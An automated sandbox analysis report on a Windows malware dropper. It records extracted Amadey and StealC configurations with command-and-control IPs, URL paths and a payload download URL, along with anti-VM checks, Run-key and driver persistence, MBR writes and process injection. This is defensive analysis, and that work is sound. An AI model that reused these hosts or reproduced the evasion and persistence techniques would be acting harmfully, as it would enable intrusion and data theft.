Analysis
-
max time kernel
125s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
25/03/2025, 12:49
Static task
static1
General
-
Target
cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe
-
Size
5.5MB
-
MD5
a1e237b0a0be86a206bdad00fdf9c888
-
SHA1
a22650c86fa1d919ffc36522cb078c218754328a
-
SHA256
cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74
-
SHA512
74fda918107ea7b82c24d9609f1b63e7be1c04f2c61fadcf4b2a213f05af1c731eb52f7aaf5d5fc8de3edde5f3a22f1db7c1db2be5294629682f9de6c7c2a7b4
-
SSDEEP
98304:hlQ5HXyIqLaRLRdNBRq955rw+q1idWNjQ++dhuMK/hzluSzcUrxr91Ba29KEvSa8:85jqKfqW1isNVhzlcSJLjg
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/6768-22105-0x0000000000400000-0x0000000000859000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/12016-21044-0x0000000000380000-0x00000000007E2000-memory.dmp healer behavioral1/memory/12016-21045-0x0000000000380000-0x00000000007E2000-memory.dmp healer behavioral1/memory/12016-21977-0x0000000000380000-0x00000000007E2000-memory.dmp healer -
Healer family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 4012 created 3408 4012 qWvzIGs.exe 55 PID 5080 created 3408 5080 qWvzIGs.exe 55 PID 5920 created 2268 5920 Organizations.com 50 -
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1k62M0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2C5168.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3d01I.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 854032868d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ad03c7d3c9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempUZDLOXU4SFD4LXVYFBDNXJH21WJW9DSD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7855124a7b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3e4d972bc6.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 35 3520 powershell.exe 45 2460 powershell.exe -
pid Process 5232 powershell.exe 3576 powershell.exe 6128 powershell.exe 6024 powershell.exe 3520 powershell.exe 2460 powershell.exe -
Downloads MZ/PE file 17 IoCs
flow pid Process 184 4592 rapes.exe 184 4592 rapes.exe 45 2460 powershell.exe 96 4592 rapes.exe 37 4592 rapes.exe 37 4592 rapes.exe 71 4592 rapes.exe 71 4592 rapes.exe 91 1280 svchost.exe 160 4592 rapes.exe 160 4592 rapes.exe 35 3520 powershell.exe 88 4592 rapes.exe 116 4592 rapes.exe 30 4592 rapes.exe 141 5364 svchost015.exe 176 2660 svchost015.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\Drivers\49ef861c.sys c7a130a0.exe File created C:\Windows\System32\Drivers\klupd_49ef861ca_arkmon.sys c7a130a0.exe -
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\49ef861c\ImagePath = "System32\\Drivers\\49ef861c.sys" c7a130a0.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_49ef861ca_arkmon\ImagePath = "System32\\Drivers\\klupd_49ef861ca_arkmon.sys" c7a130a0.exe -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2C5168.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3d01I.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3e4d972bc6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 854032868d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ad03c7d3c9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempUZDLOXU4SFD4LXVYFBDNXJH21WJW9DSD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3e4d972bc6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 854032868d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ad03c7d3c9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1k62M0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2C5168.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempUZDLOXU4SFD4LXVYFBDNXJH21WJW9DSD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7855124a7b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7855124a7b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3d01I.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1k62M0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation zx4PJh6.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation 01.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation 1k62M0.exe Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation rapes.exe -
Deletes itself 1 IoCs
pid Process 1936 w32tm.exe -
Executes dropped EXE 34 IoCs
pid Process 3108 g0t53.exe 5284 1k62M0.exe 4592 rapes.exe 4684 2C5168.exe 5392 3d01I.exe 3388 rapes.exe 4012 qWvzIGs.exe 5524 9a5599e506.exe 1108 TempUZDLOXU4SFD4LXVYFBDNXJH21WJW9DSD.EXE 2948 U0nqzpy.exe 5468 483d2fa8a0d53818306efeb32d3.exe 3520 7855124a7b.exe 5364 svchost015.exe 2780 3e4d972bc6.exe 2660 svchost015.exe 944 U0nqzpy.exe 2296 tK0oYx3.exe 2872 OkH8IPF.exe 4336 rapes.exe 5672 zx4PJh6.exe 5920 Organizations.com 2192 xu5e1_003.exe 5080 qWvzIGs.exe 60 tzutil.exe 1936 w32tm.exe 13172 RTH4oNP.exe 7348 01.exe 2636 busdrv.exe 8424 1a3866375e.exe 8812 854032868d.exe 9556 ad03c7d3c9.exe 10120 eb09826175.exe 10272 65cf7116.exe 11488 c7a130a0.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 3d01I.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 7855124a7b.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 854032868d.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 1k62M0.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 2C5168.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine TempUZDLOXU4SFD4LXVYFBDNXJH21WJW9DSD.EXE Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine 3e4d972bc6.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine ad03c7d3c9.exe Key opened \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Software\Wine rapes.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\49ef861c.sys c7a130a0.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\49ef861c.sys\ = "Driver" c7a130a0.exe -
Loads dropped DLL 17 IoCs
pid Process 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe 11488 c7a130a0.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Adds Run key to start application 2 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eb09826175.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10331910101\\eb09826175.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\854032868d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10331890101\\854032868d.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cfb79309-5618-41bd-afc7-edec30d7ebd2 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{74d3865d-d4f1-45bf-b1e6-e3454966c534}\\cfb79309-5618-41bd-afc7-edec30d7ebd2.cmd\"" c7a130a0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" g0t53.exe Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9a5599e506.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10331670101\\9a5599e506.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10331680121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ad03c7d3c9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10331900101\\ad03c7d3c9.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 139 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 c7a130a0.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000024267-71.dat autoit_exe behavioral1/files/0x000500000001eead-20888.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 5944 tasklist.exe 5324 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 5284 1k62M0.exe 4592 rapes.exe 4684 2C5168.exe 5392 3d01I.exe 3388 rapes.exe 1108 TempUZDLOXU4SFD4LXVYFBDNXJH21WJW9DSD.EXE 5468 483d2fa8a0d53818306efeb32d3.exe 3520 7855124a7b.exe 2780 3e4d972bc6.exe 4336 rapes.exe 8812 854032868d.exe 9556 ad03c7d3c9.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 4012 set thread context of 740 4012 qWvzIGs.exe 114 PID 3520 set thread context of 5364 3520 7855124a7b.exe 136 PID 2780 set thread context of 2660 2780 3e4d972bc6.exe 138 PID 2296 set thread context of 5160 2296 tK0oYx3.exe 142 PID 2872 set thread context of 1820 2872 OkH8IPF.exe 145 PID 5080 set thread context of 4804 5080 qWvzIGs.exe 173 PID 13172 set thread context of 2260 13172 RTH4oNP.exe 172 PID 8424 set thread context of 8488 8424 1a3866375e.exe 191 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 65cf7116.exe File opened (read-only) \??\VBoxMiniRdrDN c7a130a0.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job 1k62M0.exe File opened for modification C:\Windows\GuaranteesFear zx4PJh6.exe File opened for modification C:\Windows\SheDrum zx4PJh6.exe File opened for modification C:\Windows\InvestingTr zx4PJh6.exe File opened for modification C:\Windows\CylinderPair zx4PJh6.exe File opened for modification C:\Windows\OfficeForbes zx4PJh6.exe File opened for modification C:\Windows\NecessityInfections zx4PJh6.exe File opened for modification C:\Windows\VancouverPulse zx4PJh6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3560 5920 WerFault.exe 159 -
System Location Discovery: System Language Discovery 1 TTPs 62 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Organizations.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zx4PJh6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eb09826175.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qWvzIGs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 854032868d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language eb09826175.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language U0nqzpy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ad03c7d3c9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 65cf7116.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempUZDLOXU4SFD4LXVYFBDNXJH21WJW9DSD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3d01I.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9a5599e506.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3e4d972bc6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c7a130a0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7855124a7b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language U0nqzpy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xu5e1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage eb09826175.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qWvzIGs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language g0t53.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1k62M0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2C5168.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 8208 timeout.exe 4460 timeout.exe -
Kills process with taskkill 6 IoCs
pid Process 12360 taskkill.exe 7376 taskkill.exe 5108 taskkill.exe 11648 taskkill.exe 13024 taskkill.exe 4308 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ 01.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1016 schtasks.exe 4088 schtasks.exe 7416 schtasks.exe 7708 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5284 1k62M0.exe 5284 1k62M0.exe 4592 rapes.exe 4592 rapes.exe 4684 2C5168.exe 4684 2C5168.exe 4684 2C5168.exe 4684 2C5168.exe 4684 2C5168.exe 4684 2C5168.exe 5392 3d01I.exe 5392 3d01I.exe 3388 rapes.exe 3388 rapes.exe 3520 powershell.exe 3520 powershell.exe 4012 qWvzIGs.exe 4012 qWvzIGs.exe 1108 TempUZDLOXU4SFD4LXVYFBDNXJH21WJW9DSD.EXE 1108 TempUZDLOXU4SFD4LXVYFBDNXJH21WJW9DSD.EXE 740 AppLaunch.exe 740 AppLaunch.exe 740 AppLaunch.exe 740 AppLaunch.exe 6128 powershell.exe 6128 powershell.exe 6128 powershell.exe 5232 powershell.exe 5232 powershell.exe 3576 powershell.exe 3576 powershell.exe 2460 powershell.exe 2948 U0nqzpy.exe 2948 U0nqzpy.exe 2460 powershell.exe 5468 483d2fa8a0d53818306efeb32d3.exe 5468 483d2fa8a0d53818306efeb32d3.exe 3520 7855124a7b.exe 3520 7855124a7b.exe 2780 3e4d972bc6.exe 2780 3e4d972bc6.exe 944 U0nqzpy.exe 944 U0nqzpy.exe 5160 MSBuild.exe 5160 MSBuild.exe 5160 MSBuild.exe 5160 MSBuild.exe 1820 MSBuild.exe 1820 MSBuild.exe 1820 MSBuild.exe 1820 MSBuild.exe 4336 rapes.exe 4336 rapes.exe 5920 Organizations.com 5920 Organizations.com 5920 Organizations.com 5920 Organizations.com 5920 Organizations.com 5920 Organizations.com 6024 powershell.exe 6024 powershell.exe 6024 powershell.exe 5080 qWvzIGs.exe 5080 qWvzIGs.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 11488 c7a130a0.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2192 xu5e1_003.exe 2192 xu5e1_003.exe 2192 xu5e1_003.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 3520 powershell.exe Token: SeDebugPrivilege 4012 qWvzIGs.exe Token: SeDebugPrivilege 4012 qWvzIGs.exe Token: SeDebugPrivilege 6128 powershell.exe Token: SeDebugPrivilege 5232 powershell.exe Token: SeDebugPrivilege 3576 powershell.exe Token: SeDebugPrivilege 2460 powershell.exe Token: SeDebugPrivilege 5944 tasklist.exe Token: SeDebugPrivilege 5324 tasklist.exe Token: SeDebugPrivilege 6024 powershell.exe Token: SeDebugPrivilege 5080 qWvzIGs.exe Token: SeDebugPrivilege 5080 qWvzIGs.exe Token: SeDebugPrivilege 7376 taskkill.exe Token: SeDebugPrivilege 5108 taskkill.exe Token: SeDebugPrivilege 11488 c7a130a0.exe Token: SeBackupPrivilege 11488 c7a130a0.exe Token: SeRestorePrivilege 11488 c7a130a0.exe Token: SeLoadDriverPrivilege 11488 c7a130a0.exe Token: SeShutdownPrivilege 11488 c7a130a0.exe Token: SeSystemEnvironmentPrivilege 11488 c7a130a0.exe Token: SeSecurityPrivilege 11488 c7a130a0.exe Token: SeDebugPrivilege 11648 taskkill.exe -
Suspicious use of FindShellTrayWindow 15 IoCs
pid Process 5284 1k62M0.exe 5524 9a5599e506.exe 5524 9a5599e506.exe 5524 9a5599e506.exe 5920 Organizations.com 5920 Organizations.com 5920 Organizations.com 10120 eb09826175.exe 10120 eb09826175.exe 10120 eb09826175.exe 10120 eb09826175.exe 10120 eb09826175.exe 10120 eb09826175.exe 10120 eb09826175.exe 10120 eb09826175.exe -
Suspicious use of SendNotifyMessage 14 IoCs
pid Process 5524 9a5599e506.exe 5524 9a5599e506.exe 5524 9a5599e506.exe 5920 Organizations.com 5920 Organizations.com 5920 Organizations.com 10120 eb09826175.exe 10120 eb09826175.exe 10120 eb09826175.exe 10120 eb09826175.exe 10120 eb09826175.exe 10120 eb09826175.exe 10120 eb09826175.exe 10120 eb09826175.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1308 wrote to memory of 3108 1308 cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe 88 PID 1308 wrote to memory of 3108 1308 cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe 88 PID 1308 wrote to memory of 3108 1308 cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe 88 PID 3108 wrote to memory of 5284 3108 g0t53.exe 90 PID 3108 wrote to memory of 5284 3108 g0t53.exe 90 PID 3108 wrote to memory of 5284 3108 g0t53.exe 90 PID 5284 wrote to memory of 4592 5284 1k62M0.exe 91 PID 5284 wrote to memory of 4592 5284 1k62M0.exe 91 PID 5284 wrote to memory of 4592 5284 1k62M0.exe 91 PID 3108 wrote to memory of 4684 3108 g0t53.exe 92 PID 3108 wrote to memory of 4684 3108 g0t53.exe 92 PID 3108 wrote to memory of 4684 3108 g0t53.exe 92 PID 1308 wrote to memory of 5392 1308 